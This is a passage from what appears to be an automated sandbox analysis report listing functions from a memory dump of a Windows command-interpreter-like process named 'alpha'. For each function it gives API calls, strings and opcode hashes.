                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorModememset$FullNamePath_wcsicmp
                                                                                      • String ID:
                                                                                      • API String ID: 2123716050-0
                                                                                      • Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                                                                      • Instruction ID: c33577ed7e838f4116533b2cd1aa45c0be00bee234064acf45b940b66de1f3af
                                                                                      • Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                                                                      • Instruction Fuzzy Hash: 2641AF32705BC28AFBB59F31D9903E9A798EB4D78CF844034DA4D4AB98DE3CD2448710
                                                                                      Function 00007FF7937465F8 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                                                                      • String ID:
                                                                                      • API String ID: 3114114779-0
                                                                                      • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                      • Instruction ID: 525e2deb2d8e420b75b62cbbca2cd0a643d9bf773c30f48c39a1128c0257d620
                                                                                      • Opcode Fuzzy Hash: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                                                                      • Instruction Fuzzy Hash: FB414B32A05B42CAF750EF75D4842AC77AAFB48748F954135DA0D63754DF38E416C760
                                                                                      Function 00007FF79376A73C Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF793769A82), ref: 00007FF79376A77A
                                                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF793769A82), ref: 00007FF79376A7AF
                                                                                      • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF793769A82), ref: 00007FF79376A80E
                                                                                      • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF793769A82), ref: 00007FF79376A839
                                                                                      • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF793769A82), ref: 00007FF79376A850
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: QueryValue$CloseErrorLastOpen
                                                                                      • String ID:
                                                                                      • API String ID: 2240656346-0
                                                                                      • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                      • Instruction ID: 20274f0c4a1ce3b54c72eab4214c89f2c5bc18ce66d0282e73064b675f51e144
                                                                                      • Opcode Fuzzy Hash: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                                                                      • Instruction Fuzzy Hash: E0318F32A18E4286E7E0AF35E490469F7A9FB8C794F945034EA4E63754DF3CD8418B21
                                                                                      Function 00007FF79376D0C0 Relevance: 7.6, APIs: 5, Instructions: 64COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7937501B8: _get_osfhandle.MSVCRT ref: 00007FF7937501C4
                                                                                        • Part of subcall function 00007FF7937501B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF79375E904,?,?,?,?,00000000,00007FF793753491,?,?,?,00007FF793764420), ref: 00007FF7937501D6
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF79376D0F9
                                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF79376D10F
                                                                                      • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF79376D166
                                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF79376D17A
                                                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF79376D18C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                                                                      • String ID:
                                                                                      • API String ID: 3008996577-0
                                                                                      • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                      • Instruction ID: 975a45dd6b070c69b9798962f7c79023f63465ff99e22583da645b71387080a9
                                                                                      • Opcode Fuzzy Hash: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                                                                      • Instruction Fuzzy Hash: 69216D22B24A41CAF750AB71E4904BDB7B4FB4DB45B845125DE0EA3B98DF38D140CB65
                                                                                      Function 00007FF793765770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 169COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateSemaphore
                                                                                      • String ID: _p0$wil
                                                                                      • API String ID: 1078844751-1814513734
                                                                                      • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                      • Instruction ID: 5e72be8a84278277c9e201b9fd4f4ce2defecad3dd65091bed697dc5287dc396
                                                                                      • Opcode Fuzzy Hash: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                                                                      • Instruction Fuzzy Hash: 2F512D61B19B4686EEB1AF34C0E8279E298EF8C7A8FD44535D90D27B81DF3CD4059321
                                                                                      Function 00007FF79376B89C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 104memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF79376B934
                                                                                      • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF793755085), ref: 00007FF79376B9A5
                                                                                      • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF793755085), ref: 00007FF79376B9F7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                                                                      • String ID: %WINDOWS_COPYRIGHT%
                                                                                      • API String ID: 1103618819-1745581171
                                                                                      • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                      • Instruction ID: cfee13a5c693ba0bbda19f0cceb9b10cbe74937702e296b2ade4766c0f00dd46
                                                                                      • Opcode Fuzzy Hash: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                                                                      • Instruction Fuzzy Hash: E741B362A08F82C2EAA0AF2194A0279B7E4FB4DB95FC54235DE4D63395EF3CE441C710
                                                                                      Function 00007FF793770774 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$_wcslwr
                                                                                      • String ID: [%s]
                                                                                      • API String ID: 886762496-302437576
                                                                                      • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                                      • Instruction ID: 5214cc194e3d8e705c60ffce3d4627382e07c30328f736a98f2f81a944eb1d64
                                                                                      • Opcode Fuzzy Hash: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                                                                      • Instruction Fuzzy Hash: 3D318B32705B8285EBB1EF21D8943E9A7A8FB8CB88F844135CA8D5B755DF3CE6458310
                                                                                      Function 00007FF7937532E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF7937533A8: iswspace.MSVCRT(?,?,00000000,00007FF79376D6EE,?,?,?,00007FF793760632), ref: 00007FF7937533C0
                                                                                      • iswspace.MSVCRT(?,?,?,00007FF7937532A4), ref: 00007FF79375331C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: iswspace
                                                                                      • String ID: off
                                                                                      • API String ID: 2389812497-733764931
                                                                                      • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                      • Instruction ID: 0c86a218f7ea6e4159dcb68840ae0cf75a8cef2dcab79c2ba11b53070bead396
                                                                                      • Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                                                                      • Instruction Fuzzy Hash: DC21AE21E0C64281FAF87B359494379E698EF5DB80FCC8036D94E627A0DE2CE5409371
                                                                                      Function 00007FF793769308 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                      • String ID: %s=%s$DPATH$PATH
                                                                                      • API String ID: 3731854180-3148396303
                                                                                      • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                      • Instruction ID: 399a3cc95dc2a179be65de987111658aa8f0b402d8f7cbae6eb27fd21f1a1421
                                                                                      • Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                                                                      • Instruction Fuzzy Hash: 79218321B09A5280FBB4AB76E4D0279E269AF8DB84FC44135C90E67395DE2CE4418360
                                                                                      Function 00007FF793758198 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: wcscmp
                                                                                      • String ID: *.*$????????.???
                                                                                      • API String ID: 3392835482-3870530610
                                                                                      • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                      • Instruction ID: 2685e43eea88870a81fa86f84bdca02e9391c934bf42be29cf5110bcaf27548c
                                                                                      • Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                                                                      • Instruction Fuzzy Hash: 5A11C625B14B5252E7F8AB36E480139B6A4FB4CB80F985032CE8E67B45DE3DE8418710
                                                                                      Function 00007FF793769114 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: fprintf
                                                                                      • String ID: CMD Internal Error %s$%s$Null environment
                                                                                      • API String ID: 383729395-2781220306
                                                                                      • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                      • Instruction ID: c7961abc95c87a63e168d8f52d4caa0070f87552e671f145ac7facd0a327d36d
                                                                                      • Opcode Fuzzy Hash: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                                                                      • Instruction Fuzzy Hash: 5611C42190894291EBB9AB34D9940B9A26AEB4D7F4FD04332D57E632E4DF2CE841C361
                                                                                      Function 00007FF7937509F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: iswspacewcschr
                                                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                                                                      • API String ID: 287713880-1183017076
                                                                                      • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                      • Instruction ID: b53f091fbe030538e447fdfcc5512103197dee64f53fa6259f4d5a39d38a41f4
                                                                                      • Opcode Fuzzy Hash: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                                                                      • Instruction Fuzzy Hash: C8F04421A1965281FAB89B21A4C017AE594FF4EF41FC99132D95E66354DF2CD444C660
                                                                                      Function 00007FF7937504F4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: KERNEL32.DLL$SetThreadUILanguage
                                                                                      • API String ID: 1646373207-2530943252
                                                                                      • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                      • Instruction ID: 6639e58809975b004ca19671ef530676f4cb35533d9cac5f13a76d60c1c163ae
                                                                                      • Opcode Fuzzy Hash: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                                                                      • Instruction Fuzzy Hash: 63012160E09A42D1FAF8AB30A8D1174A6A8EF4E732FC40736C53F227E0DE3C65408761
                                                                                      Function 00007FF7937673C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressHandleModuleProc
                                                                                      • String ID: RaiseFailFastException$kernelbase.dll
                                                                                      • API String ID: 1646373207-919018592
                                                                                      • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                      • Instruction ID: 3643b08356e982e0e71e851df98274708064b8515c2709bd0c1a2927a80420a3
                                                                                      • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                                                                      • Instruction Fuzzy Hash: 5AF03021618B8192F6506B22F4C4079EA64FF8DBD2B849134D94E23714CF3CD585C750
                                                                                      Function 00007FF793741130 Relevance: 6.2, APIs: 4, Instructions: 156COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$CurrentDirectorytowupper
                                                                                      • String ID:
                                                                                      • API String ID: 1403193329-0
                                                                                      • Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                                                                      • Instruction ID: bc6ef15180c1081d02473598160f0225ac321c44544df032a67d0b72f97fb80c
                                                                                      • Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                                                                      • Instruction Fuzzy Hash: D661C232A087828AF7A4EB75E4842EDB7A9FB48354F944135DE5D23799DF38E450C710
                                                                                      Function 00007FF793754878 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmpDownload File
